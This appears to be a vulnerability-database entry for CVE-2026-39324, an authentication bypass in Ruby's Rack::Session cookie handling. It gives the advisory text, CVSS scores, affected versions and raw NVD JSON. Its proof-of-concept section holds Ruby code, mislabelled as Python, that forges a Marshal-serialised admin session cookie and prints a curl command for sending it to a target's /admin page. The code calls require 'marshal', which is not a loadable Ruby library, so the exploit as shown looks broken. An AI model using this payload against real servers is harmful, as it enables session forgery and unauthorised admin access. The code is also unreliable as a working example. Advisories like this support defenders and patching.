CVE-2026-39324

Description

Rack::Session is a session management implementation for Rack. From 2.0.0 to before 2.1.2, Rack::Session::Cookie incorrectly handles decryption failures when configured with secrets:. If cookie decryption fails, the implementation falls back to a default decoder instead of rejecting the cookie. This allows an unauthenticated attacker to supply a crafted session cookie that is accepted as valid session data without knowledge of any configured secret. Because this mechanism is used to load session state, an attacker can manipulate session contents and potentially gain unauthorized access. This vulnerability is fixed in 2.1.2.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:rack:rack-session:*:*:*:*:*:ruby:*:* - VULNERABLE

Rack::Session >= 2.0.0, < 2.1.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

require 'base64'
require 'marshal'

# Crafted session data to impersonate an administrator
# Attackers can manipulate the 'user_id' or 'is_admin' fields
malicious_session = {
  'user_id' => 1,
  'is_admin' => true,
  'csrf_token' => 'bypassed_token'
}

# Serialize the object using Ruby's Marshal format
# This mimics the internal format Rack uses for session storage
marshaled_data = Marshal.dump(malicious_session)

# Encode the data in Base64
# This creates a cookie payload that bypasses the decryption check
crafted_cookie_value = Base64.strict_encode64(marshaled_data)

puts "[+] Generated Malicious Cookie Payload:"
puts "Cookie: rack.session=#{crafted_cookie_value}"
puts ""
puts "Usage: curl -b 'rack.session=#{crafted_cookie_value}' http://target-url/admin"

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-39324
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-39324
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-39324/
[4] VulDB https://vuldb.com/cve/CVE-2026-39324
[5] https://github.com/rack/rack-session/security/advisories/GHSA-33qg-7wpp-89cq

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-39324", "sourceIdentifier": "[email protected]", "published": "2026-04-07T18:16:43.387", "lastModified": "2026-04-15T20:17:18.877", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Rack::Session is a session management implementation for Rack. From 2.0.0 to before 2.1.2, Rack::Session::Cookie incorrectly handles decryption failures when configured with secrets:. If cookie decryption fails, the implementation falls back to a default decoder instead of rejecting the cookie. This allows an unauthenticated attacker to supply a crafted session cookie that is accepted as valid session data without knowledge of any configured secret. Because this mechanism is used to load session state, an attacker can manipulate session contents and potentially gain unauthorized access. This vulnerability is fixed in 2.1.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-345"}, {"lang": "en", "value": "CWE-502"}, {"lang": "en", "value": "CWE-565"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rack:rack-session:*:*:*:*:*:ruby:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.1.2", "matchCriteriaId": "5A881339-CF57-45B4-B1E3-88E26A3C26A8"}]}]}], "references": [{"url": "https://github.com/rack/rack-session/security/advisories/GHSA-33qg-7wpp-89cq", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}